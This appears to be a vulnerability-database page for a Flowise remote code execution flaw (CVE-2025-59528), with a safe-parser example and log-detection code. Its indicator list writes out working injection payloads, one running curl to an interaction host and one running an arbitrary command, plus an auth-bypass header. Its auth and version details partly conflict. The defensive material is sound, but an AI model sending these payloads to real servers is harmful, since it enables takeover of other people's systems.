CVE-2025-59528
published 2025-09-22


Priority: P1 (95, critical)
CVSS 3.1 base score: 10 (AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H)
Tags: ITW, EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 90.18% (99.8th percentile)
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.
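The root cause described above is a conversion routine that evaluates the configuration string as JavaScript. The following is an added example, not Flowise's code and not its 3.0.6 patch, of the non-evaluating alternative: parse the string with JSON.parse (which can only produce data, never run code) and then validate the result against a fixed schema, rejecting everything else. The schema shape (mcpServers, command/args/env or url), the size limit and the command-name allowlist are assumptions chosen for illustration.

```javascript
'use strict';

// Added example, not Flowise's code. The defect is user input reaching the
// Function() constructor while converting mcpServerConfig to JSON. The safe
// pattern: JSON.parse (data only), then validate against a fixed schema.
// The schema below (mcpServers -> name -> {command, args?, env?} or {url})
// is an assumed illustrative shape, not Flowise's actual configuration format.

const MAX_CONFIG_BYTES = 16 * 1024;                     // assumed upper bound
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
const COMMAND_RE = /^[A-Za-z0-9_./-]+$/;                // assumed executable-name allowlist
const NAME_RE = /^[A-Za-z0-9_-]{1,64}$/;

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

// JSON.parse turns {"__proto__": ...} into an own property; refuse such keys so
// the object can never pollute prototypes if it is later merged elsewhere.
function rejectForbiddenKeys(obj, where) {
  for (const k of Object.keys(obj)) {
    if (FORBIDDEN_KEYS.has(k)) throw new Error(`${where}: forbidden key "${k}"`);
  }
}

function validateArgs(args, where) {
  if (!Array.isArray(args) || !args.every((a) => typeof a === 'string')) {
    throw new Error(`${where}: args must be an array of strings`);
  }
  return args.slice();
}

function validateEnv(env, where) {
  if (!isPlainObject(env)) throw new Error(`${where}: env must be an object`);
  rejectForbiddenKeys(env, where);
  const out = {};
  for (const [k, v] of Object.entries(env)) {
    if (typeof v !== 'string') throw new Error(`${where}: env.${k} must be a string`);
    out[k] = v;
  }
  return out;
}

function validateServer(name, entry) {
  const where = `mcpServers.${name}`;
  if (!NAME_RE.test(name)) throw new Error(`invalid server name "${name}"`);
  if (!isPlainObject(entry)) throw new Error(`${where}: must be an object`);
  rejectForbiddenKeys(entry, where);
  if (typeof entry.url === 'string') {
    const u = new URL(entry.url);                         // throws on malformed URLs
    if (u.protocol !== 'https:') throw new Error(`${where}: url must use https`);
    return { url: u.href };
  }
  if (typeof entry.command !== 'string' || !COMMAND_RE.test(entry.command)) {
    throw new Error(`${where}: command missing or contains disallowed characters`);
  }
  return {
    command: entry.command,
    args: entry.args === undefined ? [] : validateArgs(entry.args, where),
    env: entry.env === undefined ? {} : validateEnv(entry.env, where),
  };
}

// Returns { ok: true, servers } or { ok: false, error }. Nothing in this path
// evaluates the input as code, so a JavaScript expression is just invalid JSON.
function parseMcpServerConfig(input) {
  try {
    if (typeof input !== 'string') throw new TypeError('config must be a string');
    if (Buffer.byteLength(input, 'utf8') > MAX_CONFIG_BYTES) throw new Error('config too large');
    let root;
    try {
      root = JSON.parse(input);
    } catch {
      throw new Error('config is not valid JSON; JavaScript expressions are not accepted');
    }
    if (!isPlainObject(root)) throw new Error('top level must be an object');
    rejectForbiddenKeys(root, 'root');
    if (!isPlainObject(root.mcpServers)) throw new Error('mcpServers object is required');
    rejectForbiddenKeys(root.mcpServers, 'mcpServers');
    const servers = {};
    for (const [name, entry] of Object.entries(root.mcpServers)) {
      servers[name] = validateServer(name, entry);
    }
    return { ok: true, servers };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}
```

The parser returns a result object rather than throwing so the caller can log the rejection reason for detection purposes without exposing a stack trace to the client. The allowlists are deliberately narrow; loosening them is a product decision, but the one property that must never change is that no branch hands the string to Function(), eval() or a template engine.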

Affected (3 ranges)

Vendor      Product   Version range       Fixed in
flowiseai   flowise
flowiseai   flowise
flowiseai   flowise   >= 3.0.5 < 3.0.6    3.0.6

Detection & IOCs (extracted from sources)

url: /api/v1/node-load-method/customMCP
command: ({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("curl {{interactsh-url}}");return 1;})()})
command: ({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;})()})
other: x-request-from: internal
version: Flowise 3.0.5
sigma: matchers: dsl: contains(interactsh_protocol, "dns") AND contains(content_type, "application/json") AND contains(body, "No Available Actions") AND status_code == 200
  • Monitor POST requests to /api/v1/node-load-method/customMCP with a JSON body containing an 'mcpServerConfig' field holding JavaScript function expressions (e.g., patterns like '({x:(function(){' or 'process.mainModule.require')
  • Flag requests to /api/v1/node-load-method/customMCP that include the header 'x-request-from: internal', as this header is used by exploit code to bypass authentication checks
  • Exploitation activity has been observed originating from a single Starlink IP address; monitor for scanning/exploitation attempts from Starlink IP ranges against Flowise endpoints
  • The Nuclei template for this CVE checks for 'No Available Actions' in the response body after posting to /api/v1/node-load-method/customMCP; this is a successful-exploit response indicator
  • Exploitation requires authentication (JWT token via /api/v1/auth/login); monitor for a login followed immediately by a POST to /api/v1/node-load-method/customMCP as a behavioral chain indicator
  • The vulnerability exists in Flowise versions >= 2.2.7-patch.1 and up through 3.0.5; the Metasploit module targets a broad version range, so version fingerprinting is important for accurate scoping
  • Exploitation requires only an API token (authenticated), not unauthenticated access; detection rules should account for the authentication step preceding the exploit payload delivery
  • Between 12,000 and 15,000 Flowise instances are exposed online; it is unclear what percentage are running vulnerable versions, so broad network-level detection is warranted
  • CVE-2025-59528 exploitation is observed alongside two other actively exploited Flowise flaws (CVE-2025-8943 and CVE-2025-26319); detection coverage should address all three
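To turn the indicators above into something that can be run over logs, here is an added example, not taken from the page's sources, the Nuclei template or any detection product, that applies the request-level rules (payload patterns in mcpServerConfig, the x-request-from header, the 'No Available Actions' response) and the behavioral login-then-customMCP chain to constructed request records. The normalized record format, the rule names, the 60-second chain window and the sample records are all assumptions.

```javascript
'use strict';

// Added example, not the page's or any vendor's detection code. Applies the
// CVE-2025-59528 indicators listed above to constructed, normalized request
// records of the form {ts, src, method, path, headers, body, status, responseBody}.

const TARGET_PATH = '/api/v1/node-load-method/customMCP';
const LOGIN_PATH = '/api/v1/auth/login';
const CHAIN_WINDOW_MS = 60 * 1000;   // assumed window for the login -> customMCP chain

// Patterns the indicator list associates with exploit payloads in mcpServerConfig.
const PAYLOAD_PATTERNS = [
  ['js-function-expression', /\(\s*\{\s*x\s*:\s*\(\s*function\s*\(/],
  ['process-mainModule-require', /process\.mainModule\.require/],
  ['child_process-reference', /\bchild_process\b/],
];

// Pull the mcpServerConfig value out of a JSON request body; if the body is not
// JSON, scan the raw body so a malformed request cannot dodge the check.
function extractConfig(body) {
  if (typeof body !== 'string') return '';
  try {
    const parsed = JSON.parse(body);
    const cfg = parsed && parsed.mcpServerConfig;
    return typeof cfg === 'string' ? cfg : JSON.stringify(cfg ?? '');
  } catch {
    return body;
  }
}

// Case-insensitive header lookup (proxies and clients disagree on header casing).
function headerValue(headers, name) {
  const want = name.toLowerCase();
  for (const [k, v] of Object.entries(headers || {})) {
    if (k.toLowerCase() === want) return String(v);
  }
  return undefined;
}

// Per-request rules. Returns the names of the rules that fired.
function evaluateRequest(rec) {
  const hits = [];
  if (rec.method !== 'POST' || rec.path !== TARGET_PATH) return hits;
  const config = extractConfig(rec.body);
  for (const [name, re] of PAYLOAD_PATTERNS) {
    if (re.test(config)) hits.push(name);
  }
  if ((headerValue(rec.headers, 'x-request-from') || '').trim().toLowerCase() === 'internal') {
    hits.push('x-request-from-internal');
  }
  if (rec.status === 200 && /No Available Actions/.test(rec.responseBody || '')) {
    hits.push('no-available-actions-response');
  }
  return hits;
}

// Behavioral rule: sources whose customMCP POST closely follows a login POST.
function loginChainSources(records) {
  const lastLogin = new Map();
  const flagged = new Set();
  for (const rec of [...records].sort((a, b) => a.ts - b.ts)) {
    if (rec.method !== 'POST') continue;
    if (rec.path === LOGIN_PATH) lastLogin.set(rec.src, rec.ts);
    if (rec.path === TARGET_PATH) {
      const t = lastLogin.get(rec.src);
      if (t !== undefined && rec.ts - t <= CHAIN_WINDOW_MS) flagged.add(rec.src);
    }
  }
  return flagged;
}

// One alert per request that triggered at least one rule.
function analyze(records) {
  const chained = loginChainSources(records);
  const alerts = [];
  for (const rec of records) {
    const rules = evaluateRequest(rec);
    if (rec.method === 'POST' && rec.path === TARGET_PATH && chained.has(rec.src)) {
      rules.push('login-then-customMCP-chain');
    }
    if (rules.length > 0) alerts.push({ ts: rec.ts, src: rec.src, rules });
  }
  return alerts;
}

// Constructed sample records (not real traffic). The first two mimic the chain
// from the indicator list; the third is a benign, JSON-only configuration load.
const SAMPLE_RECORDS = [
  { ts: 1000, src: '198.51.100.7', method: 'POST', path: LOGIN_PATH, headers: {},
    body: '{"email":"user@example.invalid","password":"..."}', status: 200, responseBody: '' },
  { ts: 6000, src: '198.51.100.7', method: 'POST', path: TARGET_PATH,
    headers: { 'X-Request-From': 'internal', 'Content-Type': 'application/json' },
    body: JSON.stringify({ mcpServerConfig: '({x:(function(){const cp=process.mainModule.require("child_process");return 1;})()})' }),
    status: 200, responseBody: '{"message":"No Available Actions"}' },
  { ts: 7000, src: '203.0.113.9', method: 'POST', path: TARGET_PATH,
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ mcpServerConfig: '{"mcpServers":{"fs":{"command":"npx","args":["-y","server"]}}}' }),
    status: 200, responseBody: '[]' },
];
```

Running `analyze(SAMPLE_RECORDS)` yields a single alert for 198.51.100.7 carrying all six rule names, while the benign JSON-only load from 203.0.113.9 produces none. The payload patterns alone will also fire on a legitimate user who pastes JavaScript into the node by mistake, so in practice the header and login-chain rules are what raise confidence, and version fingerprinting (the >= 2.2.7-patch.1 through 3.0.5 range above) decides whether the target was actually exploitable.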

CVSS provenance

nvd: v3.1, 10.0 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck: 10.0 CRITICAL